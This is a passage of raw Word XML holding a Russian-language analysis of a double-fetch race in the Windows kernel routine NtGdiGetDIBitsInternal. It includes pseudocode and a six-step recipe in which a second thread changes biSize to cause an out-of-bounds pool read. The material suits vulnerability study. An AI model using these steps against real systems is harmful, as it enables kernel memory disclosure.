        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>biSizeImage</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>// Задает размер изображения в байтах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138833A2" w14:textId="3ADC80DB" w:rsidR="0082663B" w:rsidRPr="00460D5E" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>LONG</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>biXPelsPerMeter</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>// Задает горизонтальное разрешение в пикселях на метр целевого устройства для растрового изображения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B319A5A" w14:textId="384819F1" w:rsidR="0082663B" w:rsidRPr="00460D5E" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>LONG</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>biYPelsPerMeter</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>// Задает разрешение по вертикали в пикселях на метр целевого устройства для растрового изображения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FB59FE" w14:textId="5ADB9688" w:rsidR="0082663B" w:rsidRPr="00460D5E" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>biClrUsed</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Указывает количество цветовых индексов в таблице цветов, которые фактически используются растровым изображением.</w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2CBD50" w14:textId="77777777" w:rsidR="00460D5E" w:rsidRPr="0075529D" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>biClrImportant</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Указывает количество цветовых индексов, которые считаются важными для отображения растрового изображения.</w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="003741FC">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Если</w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="0075529D">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="003741FC">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>это</w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="0075529D">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="003741FC">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>значение</w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="0075529D">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="003741FC">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>равно</w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="0075529D">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="003741FC">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>нулю</w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="0075529D">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="003741FC">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>то</w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="0075529D">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="003741FC">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>важны</w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="0075529D">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="003741FC">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>все</w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="0075529D">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="003741FC">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>цвета</w:t>
      </w:r>
      <w:r w:rsidR="00460D5E" w:rsidRPr="0075529D">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB84350" w14:textId="516793E8" w:rsidR="0082663B" w:rsidRPr="0075529D" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FB05F6" w14:textId="77777777" w:rsidR="0082663B" w:rsidRPr="0075529D" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>BITMAPINFOHEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, *</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>LPBITMAPINFOHEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, *</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>PBITMAPINFOHEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDC1252" w14:textId="77777777" w:rsidR="003741FC" w:rsidRPr="0075529D" w:rsidRDefault="003741FC" w:rsidP="00AE75AB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1849EEFC" w14:textId="646B9911" w:rsidR="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00AE75AB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Псевдокод соответствующего кода показан ниже, где "bmi" </w:t>
      </w:r>
      <w:r w:rsidR="00460D5E">
        <w:t>— это</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> адрес, контролируемый пользователем:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD33FC" w14:textId="0CEA228E" w:rsidR="00AE75AB" w:rsidRPr="00BC2647" w:rsidRDefault="00AE75AB" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t>ProbeForRead(bmi, 4, 1);</w:t>
      </w:r>
      <w:r w:rsidR="00BC2647" w:rsidRPr="00BC2647">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC2647" w:rsidRPr="00BC2647">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00BC2647" w:rsidRPr="00BC2647">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="00B050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC2647" w:rsidRPr="00BC2647">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>checks that a user-mode buffer actually resides in the user portion of the address space, and is correctly aligned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401FF063" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  ProbeForWrite(bmi, bmi-&gt;biSize, 1); &lt;------------ Fetch #1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2455D564" w14:textId="5B258213" w:rsidR="00AE75AB" w:rsidRPr="00BC2647" w:rsidRDefault="00BC2647" w:rsidP="00BC2647">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2647">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>// checks that a user-mode buffer actually resides in the user portion of the address space, and is correctly aligned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE8257D" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  header_size = GreGetBitmapSize(bmi); &lt;----------- Fetch #2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F2DCD0" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  captured_bmi = Alloc(header_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770DFE70" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE6F796" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  ProbeForRead(bmi, header_size, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB51AB9" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  memcpy(captured_bmi, bmi, header_size); &lt;-------- Fetch #3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CEEDF9" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788C16DC" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  new_header_size = GreGetBitmapSize(bmi);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3155F8F9" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  if (header_size != new_header_size) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3D3675" w14:textId="00EDD341" w:rsidR="00AE75AB" w:rsidRPr="0075529D" w:rsidRDefault="00AE75AB" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>// Выйти.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1E5BD2" w14:textId="1A2F0476" w:rsidR="00AE75AB" w:rsidRPr="0075529D" w:rsidRDefault="00AE75AB" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B5670C" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="0075529D" w:rsidRDefault="00AE75AB" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  // Обрабатываем данные дальше.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414CDA26" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00AE75AB"/>
    <w:p w14:paraId="3C59A944" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00AE75AB">
      <w:r>
        <w:t>В приведенном фрагменте видно, что к буферу "bmi" пользовательского режима обращаются трижды: при обращении к полю biSize, в вызове GreGetBitmapSize() и в финальном вызове memcpy(). Хотя это явно условие мультивыборки, оно в основном безвредно: поскольку для "bmi" есть вызов ProbeForRead(), это должен быть адрес пользовательского режима, поэтому обход последующего вызова ProbeForWrite() путем установки bmi-&gt;biSize в 0 мало что изменит. Более того, поскольку два результата вызова GreGetBitmapSize() в конечном итоге сравниваются, внесение любых несоответствий между ними мгновенно обнаруживается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0597C22B" w14:textId="3ECE0B0D" w:rsidR="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00AE75AB">
      <w:r>
        <w:t>Насколько известно, единственным недопустимым результатом такого поведения может быть доступ на чтение к запредельной памяти пула во втором вызове GreGetBitmapSize(). Это достигается следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7520B109" w14:textId="49DECE7C" w:rsidR="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r>
        <w:t>Вызываем NtGdiGetDIBitsInternal со структурой, поле biSize которой установлено в 12 (sizeof(BITMAPCOREHEADER)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02349C36" w14:textId="7BC4A199" w:rsidR="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r>
        <w:t>Первый вызов GreGetBitmapSize() теперь возвращает 12 или аналогичное маленькое значение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3759737F" w14:textId="3BC639ED" w:rsidR="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r>
        <w:t>Это количество байт выделяется для буфера заголовка.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB0AB99" w14:textId="5643E826" w:rsidR="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r>
        <w:t>(Во втором потоке) Измените значение поля biSize на 40 (sizeof(BITMAPINFOHEADER)) перед вызовом memcpy().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB402F7" w14:textId="11A7C0FF" w:rsidR="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>memcpy() копирует маленькую структуру с неправильно большим biSize в распределение пула.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE2BDA1" w14:textId="2DECD51D" w:rsidR="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r>
        <w:t>При повторном вызове функция GreGetBitmapSize() предполагает, что поле biSize установлено адекватно размеру соответствующей области памяти, и пытается получить доступ к полям структуры по смещениям, превышающим 12.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4F58E9" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00AE75AB">
      <w:r>
